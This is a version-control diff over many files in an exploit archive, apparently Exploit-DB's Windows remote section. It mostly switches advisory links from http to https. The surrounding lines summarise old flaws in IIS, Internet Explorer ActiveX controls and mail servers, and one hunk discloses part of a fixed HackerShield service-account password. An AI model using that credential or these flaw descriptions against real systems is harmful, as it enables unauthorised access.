+1,4 @@ -Sources: http://www.securityfocus.com/bid/44443/info +Sources: https://www.securityfocus.com/bid/44443/info http://packetstormsecurity.org/files/view/97522/recordingmanager-ie.txt diff --git a/exploits/windows/remote/16737.rb b/exploits/windows/remote/16737.rb index 482ac335b..eb08fb70a 100755 --- a/exploits/windows/remote/16737.rb +++ b/exploits/windows/remote/16737.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://seclists.org/bugtraq/2010/Feb/202' ], [ 'URL', 'http://code.google.com/p/easyftpsvr/'], [ 'URL', 'https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip' ], - [ 'URL', 'http://www.securityfocus.com/bid/38262/exploit'] + [ 'URL', 'https://www.securityfocus.com/bid/38262/exploit'] ], 'Privileged' => false, 'Payload' => diff --git a/exploits/windows/remote/1787.py b/exploits/windows/remote/1787.py index 7dc358e1f..db8ffc70f 100755 --- a/exploits/windows/remote/1787.py +++ b/exploits/windows/remote/1787.py @@ -13,7 +13,7 @@ Code tasted against freeSSHd version 1.0.9 If you didn't get shell at first try, try few times and you will get lucky Advisories: -http://www.securityfocus.com/bid/17958 +https://www.securityfocus.com/bid/17958 http://www.frsirt.com/english/advisories/2006/1786 """ diff --git a/exploits/windows/remote/18089.rb b/exploits/windows/remote/18089.rb index c05823de8..42ebd7c23 100755 --- a/exploits/windows/remote/18089.rb +++ b/exploits/windows/remote/18089.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision: 0 $', 'References' => [ - [ 'URL', 'http://www.securityfocus.com/bid/49427'], + [ 'URL', 'https://www.securityfocus.com/bid/49427'], ], 'Privileged' => false, 'Payload' => diff --git a/exploits/windows/remote/18365.rb b/exploits/windows/remote/18365.rb index 6c922dbf7..773153b72 100755 --- a/exploits/windows/remote/18365.rb +++ b/exploits/windows/remote/18365.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote ['MSB', 'MS05-054'], ['CVE', '2005-1790'], ['OSVDB', '17094'], - ['URL', 'http://www.securityfocus.com/bid/13799/info'], + ['URL', 'https://www.securityfocus.com/bid/13799/info'], ['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'], ], 'DefaultOptions' => diff --git a/exploits/windows/remote/19083.cpp b/exploits/windows/remote/19083.cpp index 42c1a358d..9d72531fa 100644 --- a/exploits/windows/remote/19083.cpp +++ b/exploits/windows/remote/19083.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/106/info +source: https://www.securityfocus.com/bid/106/info It is possible to run arbitrary code on any Intel machine running Cheyenne Inoculan version 4.0 for Windows NT prior to SP2. diff --git a/exploits/windows/remote/19094.txt b/exploits/windows/remote/19094.txt index 19cd8c1eb..eb0c497de 100644 --- a/exploits/windows/remote/19094.txt +++ b/exploits/windows/remote/19094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/116/info +source: https://www.securityfocus.com/bid/116/info Vulnerabilities in an ActiveX control distributed with Internet Explorer 5 and available for Internet Explorer 4 allow malicous web sites to steal local files and to bypass cross-frame security rules. diff --git a/exploits/windows/remote/19113.txt b/exploits/windows/remote/19113.txt index 472ebf681..b1e2c6997 100644 --- a/exploits/windows/remote/19113.txt +++ b/exploits/windows/remote/19113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/140/info +source: https://www.securityfocus.com/bid/140/info A vulnerability exists within Microsoft's Telnetd daemon which allows a denial of service condition. The popular scanning tool, Nmap 2.01 or later can crash telnetd services when using the SYN scanning flag (-sS). diff --git a/exploits/windows/remote/19147.txt b/exploits/windows/remote/19147.txt index 2c9235d4c..4e4eb8f45 100644 --- a/exploits/windows/remote/19147.txt +++ b/exploits/windows/remote/19147.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/189/info +source: https://www.securityfocus.com/bid/189/info Web-based administration for IIS 4.0 is, by default, limited to the local loopback address, 127.0.0.1. In instances where IIS4.0 was installed as an upgrade to IIS 2.0 or 3.0, a legacy ISAPI DLL (ISM.DLL) is left in the /scripts/iisadmin directory. An attacker may call this DLL via the following syntax: diff --git a/exploits/windows/remote/19149.c b/exploits/windows/remote/19149.c index 05daeacb7..dd67042dd 100644 --- a/exploits/windows/remote/19149.c +++ b/exploits/windows/remote/19149.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/191/info +// source: https://www.securityfocus.com/bid/191/info An http get request against an IIS4 server will not be logged if the request is longer than 10150 bytes long. diff --git a/exploits/windows/remote/19152.txt b/exploits/windows/remote/19152.txt index 6b9b41703..086037c06 100644 --- a/exploits/windows/remote/19152.txt +++ b/exploits/windows/remote/19152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/194/info +source: https://www.securityfocus.com/bid/194/info A GET request that specifies a nonexistent file with an IISAPI-registered extension (ie .pl, .idq) will cause the IIS server to return an error message that includes the full path of the root web server directory. diff --git a/exploits/windows/remote/19156.txt b/exploits/windows/remote/19156.txt index d190e5875..1f9636423 100644 --- a/exploits/windows/remote/19156.txt +++ b/exploits/windows/remote/19156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/197/info +source: https://www.securityfocus.com/bid/197/info On January 28, 1999, Georgi Guninski originally reported a vulnerability in Internet Explorer 4.x. Internet Explorer 4.x's implentation of Cross-frame security could be bypassed if "%01" is appended to an arbitrary URL. If the specially malformed URL is inserted in a javascript after an 'about:' statement, arbitrary code can be executed on the target host. Successful exploitation could lead to access to local files, window spoofing, and arbitrary code execution. diff --git a/exploits/windows/remote/19164.txt b/exploits/windows/remote/19164.txt index 4378e8780..a9477eb78 100644 --- a/exploits/windows/remote/19164.txt +++ b/exploits/windows/remote/19164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/215/info +source: https://www.securityfocus.com/bid/215/info The Windows clipboard contains data that has been cut or copied from various windows applications. This data can be accessed and posted to malicious web forms at web sites without the knowledge of the visiting end-user. Normally, Microsoft security prevents forms from accessing data other than what was copied from within the same application, however, a Microsoft Forms 2.0 TextBox ActiveX object can bypass these security rules. diff --git a/exploits/windows/remote/19197.txt b/exploits/windows/remote/19197.txt index 0a304535c..a0e9f04bd 100644 --- a/exploits/windows/remote/19197.txt +++ b/exploits/windows/remote/19197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/233/info +source: https://www.securityfocus.com/bid/233/info A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent. diff --git a/exploits/windows/remote/19208.txt b/exploits/windows/remote/19208.txt index b27d8661f..6867a79d8 100644 --- a/exploits/windows/remote/19208.txt +++ b/exploits/windows/remote/19208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/256/info +source: https://www.securityfocus.com/bid/256/info A vulnerability in Microsoft Site Server's Ad Server Sample directory allows the retrieval of a site's configuration file (SITE.CSC) which contains sensitive information pertaining to an SQL database. diff --git a/exploits/windows/remote/19224.c b/exploits/windows/remote/19224.c index 04a9b5daf..654f838dd 100644 --- a/exploits/windows/remote/19224.c +++ b/exploits/windows/remote/19224.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/281/info +source: https://www.securityfocus.com/bid/281/info A vulnerability in Computalynx's CMail allows remote malicious users to steal local files. diff --git a/exploits/windows/remote/19239.txt b/exploits/windows/remote/19239.txt index cf0ae3f40..808023228 100644 --- a/exploits/windows/remote/19239.txt +++ b/exploits/windows/remote/19239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/299/info +source: https://www.securityfocus.com/bid/299/info The full physical path name for the IIS web server root directory may be obtained by attempting to view a non-existent .IDC file. The web server will return an error message that lists the absolute pathname of the "missing" .IDC file. diff --git a/exploits/windows/remote/19245.pl b/exploits/windows/remote/19245.pl index 21569300a..f4dd88fa3 100755 --- a/exploits/windows/remote/19245.pl +++ b/exploits/windows/remote/19245.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/307/info +source: https://www.securityfocus.com/bid/307/info Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine. diff --git a/exploits/windows/remote/19246.pm b/exploits/windows/remote/19246.pm index 8ed8fa9b5..75dc34935 100644 --- a/exploits/windows/remote/19246.pm +++ b/exploits/windows/remote/19246.pm @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/307/info +source: https://www.securityfocus.com/bid/307/info Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine. diff --git a/exploits/windows/remote/19248.c b/exploits/windows/remote/19248.c index 35123d1b8..2817295cb 100644 --- a/exploits/windows/remote/19248.c +++ b/exploits/windows/remote/19248.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/307/info +// source: https://www.securityfocus.com/bid/307/info Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine. diff --git a/exploits/windows/remote/19361.txt b/exploits/windows/remote/19361.txt index d07dc5f7b..044a17d09 100644 --- a/exploits/windows/remote/19361.txt +++ b/exploits/windows/remote/19361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/477/info +source: https://www.securityfocus.com/bid/477/info This vulnerability could allow a web site viewer to obtain the source code for .asp and similar files if the server's default language (Input Locale) is set to Chinese, Japanese or Korean. How this works is as follows: diff --git a/exploits/windows/remote/19424.pl b/exploits/windows/remote/19424.pl index 348b76bc1..75251cd94 100755 --- a/exploits/windows/remote/19424.pl +++ b/exploits/windows/remote/19424.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/529/info +source: https://www.securityfocus.com/bid/529/info MDAC (Microsoft Data Access Components) is a package used to integrate web and database services. It includes a component named RDS (Remote Data Services). RDS allows remote access via the internet to database objects through IIS. Both are included in a default installation of the Windows NT 4.0 Option Pack, but can be excluded via a custom installation. diff --git a/exploits/windows/remote/19435.html b/exploits/windows/remote/19435.html index 9aedee811..d5f7ee5df 100644 --- a/exploits/windows/remote/19435.html +++ b/exploits/windows/remote/19435.html @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/548/info +# source: https://www.securityfocus.com/bid/548/info # # A vulnerability affects Microsoft's Jet 3.51 and 4.0 driver (MSJET35.DLL and MSJET40.DLL). # diff --git a/exploits/windows/remote/19442.html b/exploits/windows/remote/19442.html index 0df29de2e..1476a7b2e 100644 --- a/exploits/windows/remote/19442.html +++ b/exploits/windows/remote/19442.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/557/info +source: https://www.securityfocus.com/bid/557/info Some Compaq computers come with a Java applet called SpawnApp. This applet is used to run Compaq diagnostic utilities from the local hard drive when certain Compaq websites are viewed. The problem is that the applet can run any program, and can be used by any webpage. This applet is signed as secure by Compaq. diff --git a/exploits/windows/remote/19448.c b/exploits/windows/remote/19448.c index fd775a98f..1b824e41e 100644 --- a/exploits/windows/remote/19448.c +++ b/exploits/windows/remote/19448.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/572/info +// source: https://www.securityfocus.com/bid/572/info ToxSoft's shareware FTP client, NextFTP, contains an unchecked buffer in the code that parses CWD command replies. If the FTP server's reply contains the exploit code, arbitrary commands can be run on the client machine. diff --git a/exploits/windows/remote/19449.c b/exploits/windows/remote/19449.c index 41a176aff..bf2bea1e7 100644 --- a/exploits/windows/remote/19449.c +++ b/exploits/windows/remote/19449.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/573/info +// source: https://www.securityfocus.com/bid/573/info The Chocoa IRC client has an unchecked buffer in the code that processes channel topics. If the server returns a topic that overwrites the client's buffer and contains exploit code arbitrary commands can be run on the client system. diff --git a/exploits/windows/remote/19450.c b/exploits/windows/remote/19450.c index a4e87df22..0277260cc 100644 --- a/exploits/windows/remote/19450.c +++ b/exploits/windows/remote/19450.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/574/info +// source: https://www.securityfocus.com/bid/574/info The ALMail32 POP3 client conatins unchecked buffers in the header parsing code. An abnormally long FROM: or TO: field in the header of an incoming email will overwrite the buffer and allow arbitrary code to be executed. diff --git a/exploits/windows/remote/19468.txt b/exploits/windows/remote/19468.txt index d5773018b..cf9e87e28 100644 --- a/exploits/windows/remote/19468.txt +++ b/exploits/windows/remote/19468.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability -source: http://www.securityfocus.com/bid/598/info +source: https://www.securityfocus.com/bid/598/info The 'scriptlet.typlib' ActiveX control can create, edit, and overwrite files on the local disk. This means that an executable text file (e.g. a '.hta' file) can be written to the startup folder of a remote machine and will be executed the next time that machine reboots. Attackers can exploit this vulnerability via a malicious web page or an email message. diff --git a/exploits/windows/remote/19486.c b/exploits/windows/remote/19486.c index b5a1a80e1..a39dae9b3 100644 --- a/exploits/windows/remote/19486.c +++ b/exploits/windows/remote/19486.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/618/info +source: https://www.securityfocus.com/bid/618/info In several versions of Netscape Communicator, there is an unchecked buffer in the code that handles EMBED tags. The buffer is in the 'plugins page' option. This vulnerability can be exploited by a malicious webpage. */ diff --git a/exploits/windows/remote/19487.txt b/exploits/windows/remote/19487.txt index 7740cde24..90eb410a0 100644 --- a/exploits/windows/remote/19487.txt +++ b/exploits/windows/remote/19487.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0/5.0 for Windows 95/Windows NT 4/Windows 2000/Windows 95/Windows 98 ActiveX "Eyedog" Vulnerability -source: http://www.securityfocus.com/bid/619/info +source: https://www.securityfocus.com/bid/619/info The Eyedog ActiveX control is marked 'safe for scripting' although it permits registry access and other information gathering methods to be used. It also contains a buffer overflow error. These weaknesses can be exploited remotely via a malicious webpage or email. diff --git a/exploits/windows/remote/19490.txt b/exploits/windows/remote/19490.txt index 75f547563..68a6d94c7 100644 --- a/exploits/windows/remote/19490.txt +++ b/exploits/windows/remote/19490.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 Import/Export Favorites Vulnerability -source: http://www.securityfocus.com/bid/627/info +source: https://www.securityfocus.com/bid/627/info The ImportExportFavorites() method, used to import and export favorites to/from a file in IE5, can be made to write to any file on the system, in some cases from an email or remote webpage. diff --git a/exploits/windows/remote/19491.txt b/exploits/windows/remote/19491.txt index c8c41f0d1..0b618e26a 100644 --- a/exploits/windows/remote/19491.txt +++ b/exploits/windows/remote/19491.txt @@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/628/info +source: https://www.securityfocus.com/bid/628/info The BindView HackerShield product (originally Netect's HackerShield) creates an NT service account called NetectAgentAdmin$. This account is a member of the local administrators group on an NT host. The service account password is not machine specific, nor is it randomly generated. The password is fourteen characters long and includes non-printable ascii characters, therefore, password cracking tools like L0phtcrack may not be able to fully display the password. -Using Paul Ashton's LSA secrets code against a Service Pack 3 machine with HackerShield installed, it is possible to recover the plaintext password for this account. As this password is the same for every HackerShield installation, an attacker could use this username / password combination to remotely access other NT hosts running the HackerShield product. +Using Paul Ashton's LSA secrets code against a Service Pack 3 machine with HackerShield installed, it is possible to recover the plaintext password for this account. As this password is the same for every HackerShield installation, an attacker could use this username / password combination to remotely access other NT hosts running the HackerShield product. The first twelve characters of the NetectAgentAdmin$ account password are: np7m4qM1M7VT diff --git a/exploits/windows/remote/19494.c b/exploits/windows/remote/19494.c index fda6839ff..59432f307 100644 --- a/exploits/windows/remote/19494.c +++ b/exploits/windows/remote/19494.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/632/info +// source: https://www.securityfocus.com/bid/632/info There is a buffer overflow on the SmartServer3 SMTP service (long MAIL FROM:) that may allow an intruder to execute arbitrary code on the target server. diff --git a/exploits/windows/remote/19495.c b/exploits/windows/remote/19495.c index 8600aeb76..df71d84c2 100644 --- a/exploits/windows/remote/19495.c +++ b/exploits/windows/remote/19495.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/633/info +// source: https://www.securityfocus.com/bid/633/info There is a buffer overflow in the CMail SMTP service (long MAIL FROM:) that may allow an attacker to execute arbitrary code on the target server. diff --git a/exploits/windows/remote/19496.c b/exploits/windows/remote/19496.c index 07e18c42d..d12e75ff8 100644 --- a/exploits/windows/remote/19496.c +++ b/exploits/windows/remote/19496.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/634/info +// source: https://www.securityfocus.com/bid/634/info There is a buffer overflow in the FuseMail POP service (long USER,PASS) that may allow an intruder to execute arbitrary code on the target server. diff --git a/exploits/windows/remote/19514.txt b/exploits/windows/remote/19514.txt index 14f572aaa..c26a328bb 100644 --- a/exploits/windows/remote/19514.txt +++ b/exploits/windows/remote/19514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/666/info +source: https://www.securityfocus.com/bid/666/info There is a buffer overflow in the 1.3.188 version of the Adobe Acrobat ActiveX control (pdf.ocx) that ships with Acrobat Viewer 4.0. This ActiveX control is marked 'Safe for Scripting' within Internet Explorer 4.X. Arbitrary commands may be executed if the ActiveX control is run in a malicious manner diff --git a/exploits/windows/remote/19515.txt b/exploits/windows/remote/19515.txt index 4da6e7199..9a49cc514 100644 --- a/exploits/windows/remote/19515.txt +++ b/exploits/windows/remote/19515.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow -source: http://www.securityfocus.com/bid/667/info +source: https://www.securityfocus.com/bid/667/info There is a buffer overflow in the setupctl ActiveX control that used to ship with some versions of Microsoft's Internet Explorer. This ActiveX control is used to link to an update site at Microsoft and is marked 'Safe for Scripting' . Arbitrary commands may be executed if the ActiveX control is run in a malicious manner. diff --git a/exploits/windows/remote/19521.txt b/exploits/windows/remote/19521.txt index 0c2fa8fdd..392e73d04 100644 --- a/exploits/windows/remote/19521.txt +++ b/exploits/windows/remote/19521.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4/Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0 hhopen OLE Control Buffer Overflow Vulnerability -source: http://www.securityfocus.com/bid/669/info +source: https://www.securityfocus.com/bid/669/info There is a buffer overflow in the 1.0.0.1 version of the hhopen OLE control (hhopen.ocx) that ships with some versions of Internet Explorer. This control is marked 'Safe for Scripting' . Arbitrary commands may be executed if the OLE control is run in a malicious manner. diff --git a/exploits/windows/remote/19530.txt b/exploits/windows/remote/19530.txt index 97315a625..dddd1423f 100644 --- a/exploits/windows/remote/19530.txt +++ b/exploits/windows/remote/19530.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 Download Behavior Vulnerability -source: http://www.securityfocus.com/bid/674/info +source: https://www.securityfocus.com/bid/674/info The "download behavior" feature of Microsoft's Internet Explorer 5 may allow a malicious web site operator to read files on an IE5 client computer or on a computer that is in the client's 'Local Intranet' web content zone. diff --git a/exploits/windows/remote/19537.txt b/exploits/windows/remote/19537.txt index 1bedfceb3..5392a46d0 100644 --- a/exploits/windows/remote/19537.txt +++ b/exploits/windows/remote/19537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/689/info +source: https://www.securityfocus.com/bid/689/info TeamTrack 3.00 has a built-in webserver which is meant to be used during the evaluation period, or until IIS or Netscape Enterprise/FastTrack is installed. This server does not filter out requested paths containing the ../ sequence. Because of this, an attacker can specify a file outside of the normal web file structure. The name and relative path (from the web root) of the file must be known by the attacker. diff --git a/exploits/windows/remote/19539.txt b/exploits/windows/remote/19539.txt index 10549eafe..fc60ca231 100644 --- a/exploits/windows/remote/19539.txt +++ b/exploits/windows/remote/19539.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0/Unix 5.0 IFRAME Vulnerability -source: http://www.securityfocus.com/bid/696/info +source: https://www.securityfocus.com/bid/696/info Internet Explorer 5 will allow a malicious web page to read the contents of local files through a weakness in the IE5 security model. Normally the document.execCommand method is restricted from reading and returning data on the local machine, however if the method is called from within an IFRAME this restriction can be circumvented. diff --git a/exploits/windows/remote/19540.txt b/exploits/windows/remote/19540.txt index 57fdc7d07..71b26f34e 100644 --- a/exploits/windows/remote/19540.txt +++ b/exploits/windows/remote/19540.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/699/info +source: https://www.securityfocus.com/bid/699/info The Jana webserver is susceptible to directory traversal attacks using multiple dots in the URL. If the request is made in specific formats, the server will send out files outside of the intended webroot. diff --git a/exploits/windows/remote/19559.txt b/exploits/windows/remote/19559.txt index 01780dda0..43a077813 100644 --- a/exploits/windows/remote/19559.txt +++ b/exploits/windows/remote/19559.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Microsoft Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0/Unix 5.0 Javascript URL Redirection Vulnerability -source: http://www.securityfocus.com/bid/722/info +source: https://www.securityfocus.com/bid/722/info A malicious web site operator could design a web page that, when visited by an IE5 user, would read a local file from the victim host (or any file on the victim's network to which the victim has access) and send the contents of that file to a designated remote location. diff --git a/exploits/windows/remote/19561.c b/exploits/windows/remote/19561.c index 633ca2019..8832eeb01 100644 --- a/exploits/windows/remote/19561.c +++ b/exploits/windows/remote/19561.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/730/info +// source: https://www.securityfocus.com/bid/730/info // // True North Software's Internet Anywhere Mail Server has various weaknesses that could allow an attacker to remotely crash the server running this software.. The POP3 commands "list", "retr" .uidl" and "user" and the SMTP command "vrfy", if sent with abnormally long arguments, will crash the server. These limits seem to be around 200 characters for the POP3 commands, and around 250 characters for the SMTP command. // diff --git a/exploits/windows/remote/19566.c b/exploits/windows/remote/19566.c index 9e4fd1437..d92927993 100644 --- a/exploits/windows/remote/19566.c +++ b/exploits/windows/remote/19566.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/739/info +// source: https://www.securityfocus.com/bid/739/info There is a remotely exploitable buffer overflow vulnerability in the CGI program "imagemap", which is distributed with Omnicron's OmniHTTPD. During operations made on arguments passed to the program, a lack of bounds checking on a strcpy() call can allow for arbitrary code to be executed on the machine running the server. diff --git a/exploits/windows/remote/19568.txt b/exploits/windows/remote/19568.txt index 9a1eacd30..0561ccb70 100644 --- a/exploits/windows/remote/19568.txt +++ b/exploits/windows/remote/19568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/746/info +source: https://www.securityfocus.com/bid/746/info The URL Live! free webserver from Pacific software is susceptible to the "../" directory traversal vulnerability. By using the '../' string in a URL, an attacker can gain read access to files outside the intended web file structure. diff --git a/exploits/windows/remote/19570.txt b/exploits/windows/remote/19570.txt index 81e0c0ac5..62a6a79e3 100644 --- a/exploits/windows/remote/19570.txt +++ b/exploits/windows/remote/19570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/747/info +source: https://www.securityfocus.com/bid/747/info WFTPD is reported prone to a remote buffer overflow vulnerability. The issue exists due to a lack of sufficient bounds checking performed on MKD and CWD arguments. It is reported that superfluous data passed to MKD first and then to CWD results in the overflow. diff --git a/exploits/windows/remote/19580.txt b/exploits/windows/remote/19580.txt index 1f083c665..84ae3e06e 100644 --- a/exploits/windows/remote/19580.txt +++ b/exploits/windows/remote/19580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/755/info +source: https://www.securityfocus.com/bid/755/info The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote buffer overflow vulnerability. The buffer overflow can be initiated by passing 856 characters in the password field. diff --git a/exploits/windows/remote/19581.txt b/exploits/windows/remote/19581.txt index cb46bd170..ef34167e9 100644 --- a/exploits/windows/remote/19581.txt +++ b/exploits/windows/remote/19581.txt @@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/755/info +source: https://www.securityfocus.com/bid/755/info The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote buffer overflow vulnerability. The buffer overflow can be initiated by passing 856 characters in the password field. -source: http://www.securityfocus.com/bid/755/info +source: https://www.securityfocus.com/bid/755/info The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote buffer overflow vulnerability. The buffer overflow can be initiated by passing 856 characters in the password field. diff --git a/exploits/windows/remote/19584.c b/exploits/windows/remote/19584.c index fe264bf30..93506d679 100644 --- a/exploits/windows/remote/19584.c +++ b/exploits/windows/remote/19584.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/759/info +// source: https://www.securityfocus.com/bid/759/info The Skyfull mail server version 1.1.4 has an unchecked buffer into which the argument from the MAIL FROM command is placed. This buffer can be overwritten and arbitrary code can be executed. diff --git a/exploits/windows/remote/19586.c b/exploits/windows/remote/19586.c index 27705eebd..70c54340a 100644 --- a/exploits/windows/remote/19586.c +++ b/exploits/windows/remote/19586.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/761/info +// source: https://www.securityfocus.com/bid/761/info In certain versions of the BTD Zom-Mail server there exists a buffer overflow which may be remotely exploitable by malicious users. The problem in question is in the handling of overly (past 256 chars) long file names for file attachments. diff --git a/exploits/windows/remote/19587.txt b/exploits/windows/remote/19587.txt index 568ccb3f8..38a683529 100644 --- a/exploits/windows/remote/19587.txt +++ b/exploits/windows/remote/19587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/762/info +source: https://www.securityfocus.com/bid/762/info Certain versions of the AN-HTTPd server contain default CGI scripts that allow code to be executed remotely. This is due to poor sanity checking on user supplied data. diff --git a/exploits/windows/remote/19588.c b/exploits/windows/remote/19588.c index 987ef6cab..6deeb473f 100644 --- a/exploits/windows/remote/19588.c +++ b/exploits/windows/remote/19588.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/763/info +// source: https://www.securityfocus.com/bid/763/info Certain versions of the IBM Web page printout software "IBM HomePagePrint " can in some instances be remotely exploited by malicious webservers. The problem lies in a buffer overflow in the code which handles IMG_SRC tags. If a page containing a specially constructed IMG SRC tag is previewed or printed using the IBM HomePagePrint software, arbitrary code can be run on the client. diff --git a/exploits/windows/remote/19589.txt b/exploits/windows/remote/19589.txt index 249138feb..9ce608b72 100644 --- a/exploits/windows/remote/19589.txt +++ b/exploits/windows/remote/19589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/764/info +source: https://www.securityfocus.com/bid/764/info The aVirt Mail Server has a weakness in the code that handles the RCPT TO command. By specifying a path in the command instead of an email recipient , an attacker could cause the mail server to create a directory in the server's local filesystem. diff --git a/exploits/windows/remote/19591.txt b/exploits/windows/remote/19591.txt index 9630a3391..8a1115bef 100644 --- a/exploits/windows/remote/19591.txt +++ b/exploits/windows/remote/19591.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 3/Windows NT 4,Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4,Outlook 98 0 window.open Redirect Vulnerability -source: http://www.securityfocus.com/bid/766/info +source: https://www.securityfocus.com/bid/766/info If window.open is called with a target URL that redirects to a client-side file and then a variable is created pointing to the contents of the new window, the contents of the new window (the local file) can be read and possibly manipulated or transmitted by other code in the webpage. diff --git a/exploits/windows/remote/19592.asm b/exploits/windows/remote/19592.asm index f55e60277..ede737ae8 100644 --- a/exploits/windows/remote/19592.asm +++ b/exploits/windows/remote/19592.asm @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/767/info +source: https://www.securityfocus.com/bid/767/info At installation, the Real Server software randomly selects an unused port as the remote administration port. This port is used by Real Server's remote web administration feature. To access this feature, the correct port must be specified and a valid username/password pair must be entered. By sending a long response to this authentication request, the buffer can be overwritten and arbitrary code can be executed on the server. diff --git a/exploits/windows/remote/19593.c b/exploits/windows/remote/19593.c index 0d84e70e9..e068ca272 100644 --- a/exploits/windows/remote/19593.c +++ b/exploits/windows/remote/19593.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/767/info +// source: https://www.securityfocus.com/bid/767/info At installation, the Real Server software randomly selects an unused port as the remote administration port. This port is used by Real Server's remote web administration feature. To access this feature, the correct port must be specified and a valid username/password pair must be entered. By sending a long response to this authentication request, the buffer can be overwritten and arbitrary code can be executed on the server. diff --git a/exploits/windows/remote/19595.c b/exploits/windows/remote/19595.c index e06e2f403..0ba25f904 100644 --- a/exploits/windows/remote/19595.c +++ b/exploits/windows/remote/19595.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/770/info +// source: https://www.securityfocus.com/bid/770/info There are several CGI programs that ship with the Alibaba webserver. Many of these do not do proper input handling, and therefore will allow requests for access to files outside of normal or safe webserver practice. This results in various situations where an attacker can view, overwrite, create and delete files anywhere on the server. diff --git a/exploits/windows/remote/19601.txt b/exploits/windows/remote/19601.txt index 6fcc45f8d..858529d4f 100644 --- a/exploits/windows/remote/19601.txt +++ b/exploits/windows/remote/19601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/773/info +source: https://www.securityfocus.com/bid/773/info Etype's Eserv product is designed to be a one-source internet connectivity 